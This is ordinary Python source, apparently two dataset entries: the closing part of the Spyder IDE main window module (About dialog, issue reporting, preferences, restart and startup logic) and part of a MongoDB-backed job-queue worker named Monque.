| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""Create About Spyder dialog with general information."""
versions = get_versions()
# Show Git revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
# Get current font properties
font = self.font()
font_family = font.family()
font_size = font.pointSize()
if sys.platform == 'darwin':
font_size -= 2
msgBox = QMessageBox(self)
msgBox.setText(
"""
<div style='font-family: "{font_family}";
font-size: {font_size}pt;
font-weight: normal;
'>
<p>
<b>Spyder {spyder_ver}</b> {revision}
<br>
The Scientific Python Development Environment |
<a href="{website_url}">Spyder-IDE.org</a>
<br>
Copyright © 2009-2019 Spyder Project Contributors and
<a href="{github_url}/blob/master/AUTHORS.txt">others</a>.
<br>
Distributed under the terms of the
<a href="{github_url}/blob/master/LICENSE.txt">MIT License</a>.
</p>
<p>
Created by Pierre Raybaut; current maintainer is Carlos Cordoba.
Developed by the
<a href="{github_url}/graphs/contributors">international
Spyder community</a>. Many thanks to all the Spyder beta testers
and dedicated users.
</p>
<p>For help with Spyder errors and crashes, please read our
<a href="{trouble_url}">Troubleshooting Guide</a>, and for bug
reports and feature requests, visit our
<a href="{github_url}">Github site</a>. For project discussion,
see our <a href="{forum_url}">Google Group</a>.
</p>
<p>
This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development.
The popular Python distributions
<a href="https://www.anaconda.com/download/">Anaconda</a> and
<a href="https://winpython.github.io/">WinPython</a>
also contribute to this plan.
</p>
<p>
Python {python_ver} {bitness}-bit | Qt {qt_ver} |
{qt_api} {qt_api_ver} | {os_name} {os_ver}
</p>
<p><small>Certain source files under other compatible permissive
licenses and/or originally by other authors.
Spyder 3 theme icons derived from
<a href="https://fontawesome.com/">Font Awesome</a> 4.7
(© 2016 David Gandy; SIL OFL 1.1) and
<a href="http://materialdesignicons.com/">Material Design</a>
(© 2014 Austin Andrews; SIL OFL 1.1).
Most Spyder 2 theme icons sourced from the
<a href="https://www.everaldo.com">Crystal Project iconset</a>
(© 2006-2007 Everaldo Coelho; LGPL 2.1+).
Other icons from
<a href="http://p.yusukekamiyamane.com/">Yusuke Kamiyamane</a>
(© 2013 Yusuke Kamiyamane; CC-BY 3.0),
the <a href="http://www.famfamfam.com/lab/icons/silk/">FamFamFam
Silk icon set</a> 1.3 (© 2006 Mark James; CC-BY 2.5), and
the <a href="https://www.kde.org/">KDE Oxygen icons</a>
(© 2007 KDE Artists; LGPL 3.0+).</small>
</p>
<p>
See the <a href="{github_url}/blob/master/NOTICE.txt">NOTICE</a>
file for full legal information.
</p>
</div>
""".format(
spyder_ver=versions['spyder'],
revision=revlink,
website_url=__website_url__,
github_url=__project_url__,
trouble_url=__trouble_url__,
forum_url=__forum_url__,
python_ver=versions['python'],
bitness=versions['bitness'],
qt_ver=versions['qt'],
qt_api=versions['qt_api'],
qt_api_ver=versions['qt_api_ver'],
os_name=versions['system'],
os_ver=versions['release'],
font_family=font_family,
font_size=font_size,
)
)
msgBox.setWindowTitle(_("About %s") % "Spyder")
msgBox.setStandardButtons(QMessageBox.Ok)
from spyder.config.gui import is_dark_interface
if PYQT5:
if is_dark_interface():
icon_filename = "spyder.svg"
else:
icon_filename = "spyder_dark.svg"
else:
if is_dark_interface():
icon_filename = "spyder.png"
else:
icon_filename = "spyder_dark.png"
app_icon = QIcon(get_image_path(icon_filename))
msgBox.setIconPixmap(app_icon.pixmap(QSize(64, 64)))
msgBox.setTextInteractionFlags(
Qt.LinksAccessibleByMouse | Qt.TextSelectableByMouse)
msgBox.exec_()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
def render_issue(self, description='', traceback=''):
"""Render issue before sending it to Github"""
# Get component versions
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
# Make a description header in case no description is supplied
if not description:
description = "### What steps reproduce the problem?"
# Make error section from traceback and add appropriate reminder header
if traceback:
error_section = ("### Traceback\n"
"```python-traceback\n"
"{}\n"
"```".format(traceback))
else:
error_section = ''
issue_template = """\
## Description
{description}
{error_section}
## Versions
* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}
### Dependencies
```
{dependencies}
```
""".format(description=description,
error_section=error_section,
spyder_version=versions['spyder'],
commit=revision,
python_version=versions['python'],
qt_version=versions['qt'],
qt_api_name=versions['qt_api'],
qt_api_version=versions['qt_api_ver'],
os_name=versions['system'],
os_version=versions['release'],
dependencies=dependencies.status())
return issue_template
@Slot()
def report_issue(self, body=None, title=None, open_webpage=False):
"""Report a Spyder issue to github, generating body text if needed."""
if body is None:
from spyder.widgets.reporterror import SpyderErrorDialog
report_dlg = SpyderErrorDialog(self, is_report=True)
report_dlg.show()
else:
if open_webpage:
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
from qtpy.QtCore import QUrlQuery
url = QUrl(__project_url__ + '/issues/new')
query = QUrlQuery()
query.addQueryItem("body", quote(body))
if title:
query.addQueryItem("title", quote(title))
url.setQuery(query)
QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
active_path = [p for p in self.path if p not in self.not_active_path]
return active_path + self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
for path in self.path + self.project_path:
while path in sys.path:
sys.path.remove(path)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path,
self.not_active_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
try:
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
encoding.writelines(self.not_active_path,
self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError:
pass
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
plugin.dockwidget.setFeatures(features)
plugin.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
self.prefs_dialog_instance = dlg
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
] + self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
dlg = ShortcutsSummaryDialog(None)
dlg.exec_()
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
"""Open file list management dialog box."""
if self.fileswitcher is not None and \
self.fileswitcher.is_visible:
self.fileswitcher.hide()
self.fileswitcher.is_visible = False
return
if symbol:
self.fileswitcher.plugin = self.editor
self.fileswitcher.set_search_text('@')
else:
self.fileswitcher.set_search_text('')
self.fileswitcher.show()
self.fileswitcher.is_visible = True
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
"""Add a plugin to the File Switcher."""
if self.fileswitcher is None:
from spyder.widgets.fileswitcher import FileSwitcher
self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
else:
self.fileswitcher.add_plugin(plugin, tabs, data, icon)
self.fileswitcher.sig_goto_file.connect(
plugin.get_current_tab_manager().set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** For Pytest ****
# We need to create MainWindow **here** to avoid passing pytest
# options to Spyder
if running_under_pytest():
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock # Python 2
options = Mock()
options.working_directory = None
options.profile = False
options.multithreaded = False
options.new_instance = False
options.project = None
options.window_title = None
options.opengl_implementation = None
options.debug_info = None
options.debug_output = None
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = initialize()
window = run_spyder(app, options, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, argparse won't be able to exit if --help option is passed
options, args = get_options()
# **** Set OpenGL implementation to use ****
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = initialize()
# **** Handle other options ****
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Show crash dialog ****
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(
None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>spyder --reset</b></span>"
"<br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If Spyder still fails to launch, you should consult our "
"comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
"which when followed carefully solves the vast majority of "
"crashes; also, take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"submitting a report to our <a href=\"%s\">issue tracker</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __trouble_url__, __project_url__,
__forum_url__, __project_url__))
# **** Create main window ****
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occured
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
worker.py
|
#!/usr/bin/env python
# encoding: utf-8
"""
worker.py
Created by Kurtiss Hare on 2010-03-12.
"""
import datetime
import logging
import multiprocessing
import os
import pymongo.objectid
import signal
import socket
import time
import util
class MonqueWorker(object):
def __init__(self, monque, queues=None, dispatcher="fork"):
self._monque = monque
self._queues = queues or []
self._worker_id = None
self._child = None
self._shutdown_status = None
self._dispatcher = dispatcher
def register_worker(self):
self._worker_id = pymongo.objectid.ObjectId()
c = self._monque.get_collection('workers')
c.insert(dict(
_id = self._worker_id,
hostname = socket.gethostname(),
pid = os.getpid(),
start_time = None,
job = None,
retried = 0,
processed = 0,
failed = 0
))
def unregister_worker(self):
wc = self._monque.get_collection('workers')
wc.remove(dict(_id = self._worker_id))
def work(self, interval=5):
self.register_worker()
self._register_signal_handlers()
util.setprocname("monque: Starting")
try:
while not self._shutdown_status:
worked = self._work_once()
if interval == 0:
break
if not worked:
util.setprocname("monque: Waiting on queues: {0}".format(','.join(self._queues)))
time.sleep(interval)
finally:
self.unregister_worker()
def _work_once(self):
order = self._monque.dequeue(self._queues, grabfor=60*60)
if not order:
return False
if order:
try:
self.working_on(order)
self.process(order)
except Exception, e:
self._handle_job_failure(order, e)
else:
self.done_working(order)
finally:
c = self._monque.get_collection('workers')
c.update(dict(_id = self._worker_id), {
'$set' : dict(
start_time = None,
job = None,
)
})
return True
def working_on(self, order):
c = self._monque.get_collection('workers')
c.update(dict(_id = self._worker_id), {
'$set' : dict(
start_time = datetime.datetime.utcnow(),
job = order.job.__serialize__(),
)
})
c = self._monque.get_collection('queue_stats')
order.mark_start()
def process(self, order):
if self._dispatcher == "fork":
child = self._child = multiprocessing.Process(target=self._process_target, args=(order,))
self._child.start()
util.setprocname("monque: Forked {0} at {1}".format(self._child.pid, time.time()))
while True:
try:
child.join()
except OSError, e:
if 'Interrupted system call' not in e:
raise
continue
break
self._child = None
if child.exitcode != 0:
raise Exception("Job failed with exit code {0}".format(child.exitcode))
else:
self.dispatch(order)
def done_working(self, order):
self._monque.remove(order.queue, order.job_id)
self.processed(order)
def _process_target(self, order):
self.reset_signal_handlers()
self.dispatch(order)
def dispatch(self, order):
util.setprocname("monque: Processing {0} since {1}".format(order.queue, time.time()))
order.job.run()
def _handle_job_failure(self, order, e):
import traceback
logging.warn("Job failed ({0}): {1}\n{2}".format(order.job, str(e), traceback.format_exc()))
if order.retries > 0:
order.fail(e)
self._monque.update(order.queue, order.job_id, delay=min(2**(len(order.failures)-1), 60), failure=str(e))
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(retried = 1)})
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(retries=1)}, upsert=True)
else:
self.failed(order)
def processed(self, order):
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(processed = 1)})
duration = order.mark_completion()
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(successes=1, success_duration=duration.seconds)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(size=-1)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(success_duration=duration.seconds)}, upsert=True)
def failed(self, order):
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(failed = 1)})
duration = order.mark_completion()
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(failures=1, failure_duration=duration.seconds)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(size=-1)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(failure_duration=duration.seconds)}, upsert=True)
def _register_signal_handlers(self):
signal.signal(signal.SIGQUIT, lambda num, frame: self._shutdown(graceful=True))
if self._dispatcher == "fork":
signal.signal(signal.SIGTERM, lambda num, frame: self._shutdown())
signal.signal(signal.SIGINT, lambda num, frame: self._shutdown())
signal.signal(signal.SIGUSR1, lambda num, frame: self._kill_child())
def reset_signal_handlers(self):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
